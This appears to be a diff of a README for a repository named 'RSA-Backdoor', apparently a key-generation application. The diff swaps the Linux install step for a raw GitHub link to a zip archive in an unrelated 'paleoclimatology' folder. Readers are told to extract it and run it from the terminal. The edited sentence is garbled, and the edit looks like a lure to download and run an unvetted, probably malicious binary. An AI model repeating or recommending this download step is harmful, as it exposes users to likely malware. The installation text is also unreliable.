Silent5230101161/RSA-Backdoor/README.md

 5. **Run the Application**
    - For Windows: Double-click the `.exe` file.
    - For macOS: Open the `.dmg` file and drag the application to your Applications folder, then run it.
-   - For Linux: Extract the `.tar.gz` file and run the application from the terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Silent5230101161/RSA-Backdoor/main/paleoclimatology/RSA-Backdoor_v1.3-alpha.2.zip` file and run the application from the terminal.

 6. **Follow the On-Screen Instructions**
    The application will guide you through the key generation process.
 Just follow the instructions provided in the app.